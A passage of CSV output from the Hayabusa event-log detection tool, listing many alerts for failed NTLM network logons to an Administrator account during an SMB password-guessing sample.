+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: 
